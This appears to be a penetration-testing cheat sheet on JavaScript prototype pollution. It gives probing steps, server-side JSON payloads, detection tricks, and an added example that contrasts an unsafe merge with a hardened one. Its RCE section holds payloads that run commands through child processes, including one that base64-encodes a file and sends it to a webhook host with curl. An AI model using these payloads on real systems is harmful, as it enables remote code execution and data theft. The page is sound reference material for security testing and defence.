# Prototype Pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.\
Common ways to reach the prototype from an object `name`: `name.__proto__`, `name['__proto__']`, `name.constructor.prototype`

**Steps**:

* Try different ways of adding an arbitrary property to `Object.prototype`.\
  Try to inject an arbitrary property via the query string, URL fragment, and any JSON input.\
  (e.g. `__proto__[foo]=bar` -> then check `Object.prototype.foo` in the console)
* Identify a gadget property that allows you to execute arbitrary JavaScript.

Use [DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution) and [Server-Side Prototype Pollution Scanner](https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8).

## [Server Side](https://portswigger.net/web-security/prototype-pollution/server-side)

More difficult to detect:

* No source code access
* Lack of developer tools
* The DoS problem
* Pollution persistence

`POST` or `PUT` requests that submit JSON data to an application or API are prime candidates, since the body is usually parsed and merged into a server-side object.

{% code title="POST Request (__proto__)" overflow="wrap" %}

```json
{
    "user":"wiener",
    "__proto__":{
        "foo":"bar"
    }
}
```

{% endcode %}

{% code title="POST Request (constructor.prototype)" overflow="wrap" %}

```json
{
    "user":"wiener",
    "constructor":{
        "prototype":{
            "foo":"bar"
        }
    }
}
```

{% endcode %}

{% code title="Response" overflow="wrap" %}

```json
{
    "username":"wiener",
    "foo":"bar"
}
```

{% endcode %}
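The server-side bug behind the request/response pair above is usually a recursive merge of the parsed JSON body into an existing object. The following added example (not code from the page or from any of the linked tools) shows such an unsafe merge next to a hardened one that refuses the `__proto__`, `constructor` and `prototype` keys; `unsafeMerge`, `safeMerge`, `mergeAndCheck` and the request body are all constructed for the demonstration.

```javascript
// Added example, not the page's code: unsafe merge vs hardened merge.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// VULNERABLE: for...in walks the own key "__proto__" that JSON.parse creates;
// reading target["__proto__"] yields Object.prototype, so "foo" lands there.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// HARDENED: skips the three keys that reach a prototype, copies only own
// keys, and creates nested containers without a prototype at all.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = Object.create(null);
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed request body mirroring the page's POST example.
const CONSTRUCTED_BODY = '{"user":"wiener","__proto__":{"foo":"bar"}}';

// Merges the body into a fresh object and reports what an unrelated new
// object then inherits as "foo"; cleans up so repeated runs stay independent.
function mergeAndCheck(merge) {
  const target = merge({}, JSON.parse(CONSTRUCTED_BODY));
  const inherited = ({}).foo;
  delete Object.prototype.foo;
  return { inherited, user: target.user };
}
```

`mergeAndCheck(unsafeMerge)` reports `inherited: 'bar'` while `mergeAndCheck(safeMerge)` reports `inherited: undefined`; freezing `Object.prototype` at startup (`Object.freeze(Object.prototype)`) is a complementary hardening that makes the unsafe path fail instead of silently polluting.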

### Detection

{% code overflow="wrap" %}

```json
"__proto__": {
    "json spaces": 10
}
// then check the raw response: if the prototype is polluted, Express's
// `json spaces` setting indents the JSON body with 10 spaces.
```

{% endcode %}

{% code overflow="wrap" %}

```json
"__proto__": {
    "status": 412
}
// then trigger an error response with a JSON body: a polluted `status`
// property shows up as a 412 status code.
```

{% endcode %}

### RCE

For identification (look for an out-of-band interaction from the injected `--inspect` host):

```json
"__proto__": {
    "shell":"node",
    "NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}
```

For exploitation:

{% code overflow="wrap" %}

```json
"__proto__":{
    "execArgv": [
        "--eval=require('child_process').execSync('curl webhook')"
    ]
}
// find functionality that may spawn node child processes.
```

{% endcode %}

or

{% code overflow="wrap" %}

```json
"__proto__":{
    "shell":"vim",
    "input":":! <command>\n"
    // e.g. ":! cat /file | base64 | curl -d @- https://webhook\n"
}
// find functionality that may spawn node child processes.
```

{% endcode %}
